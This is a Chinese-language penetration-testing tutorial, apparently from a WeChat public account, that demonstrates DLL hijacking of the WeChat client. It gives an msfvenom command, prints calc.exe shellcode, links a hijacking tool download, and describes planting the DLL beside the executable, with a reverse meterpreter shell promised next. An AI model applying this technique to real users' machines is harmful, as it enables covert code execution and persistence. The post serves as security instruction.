微信DLL劫持攻击

欢迎回来

什么是DLL劫持呢？

引用某度的说法：

<DLL劫持>技术当一个可执行文件运行时，Windows加载器将可执行模块映射到进程的地址空间中，加载器分析可执行模块的输入表，并设法找出任何需要的DLL，并将它们映射到进程的地址空间中

比较通俗易懂的说法：

当一个可执行程序运行时,windwos会加载程序运行必要的DLL文件,而系统会先在程序目录寻找DLL,如果没找到再到windows系统目录下寻找,最后在环境变量中列出的目录下查找,我们根据这一特性可以把恶意DLL放到程序目录下,等程序下一次运行,达到劫持目的

如何DLL劫持呢？

通常我们对某个应用，前提是没有加壳，一般我们通过分析，找到程序运行时加载的DLL，对其进行替换，当程序运行起来时，加载该DLL，就达到了劫持的目的，DLL被劫持之后，我们一般进行反弹会话之类的，此类的DLL可以通过MSF生成，我们可以在下期看看如何实现，此次我们利用自动化工具进行微信DLL劫持

DLL加载顺序

       1-应用程序的目录
       2-c:windowssystem32
       3-c:windowssystem
       4-c:windows
       5-当前工作目录
       6-系统PATH环境变量
       7-用户PATH环境变量

我们尝试对微信进行DLL劫持，当运行的时候使其弹出计算器

msfvenom -p windows/exec cmd=calc.exe -f c -o shell.c

使用MSF生成shellcode，生成的如下：

xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffxacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8bx01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xebx8dx5dx6ax01x8dx85xb2x00x00x00x50x68x31x8bx6fx87xffxd5xbbxe0x1dx2ax0ax68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53xffxd5x63x61x6cx63x2ex65x78x65x00

将生成的shellcode文件复制到软件中

生成DLL，生成结果如下

接下来劫持文件

选择刚才生成的DLL文件，并选择需要劫持的程序，点击导入注册表，该程序会自动备份被劫持的可执行程序

最后我们需要将生成的两个文件复制到被劫持的可执行程序同目录下

复制完成如下(因为两个文件位置相差远，就只看到一个)

这个时候我们打开微信

成功弹出计算器，接下来我们再来尝试一下TIM

工具下载地址：

链接：https://pan.baidu.com/s/1Ku_hcLMQK07cJ1EQoN7OmA 提取码：6b9l

当然我们也可以生成反弹meterpreter会话的DLL，下期带来这部分内容，感兴趣的可以关注一下

欢迎分享，关注

原文始发于微信公众号（Kali渗透测试教程）：微信DLL劫持攻击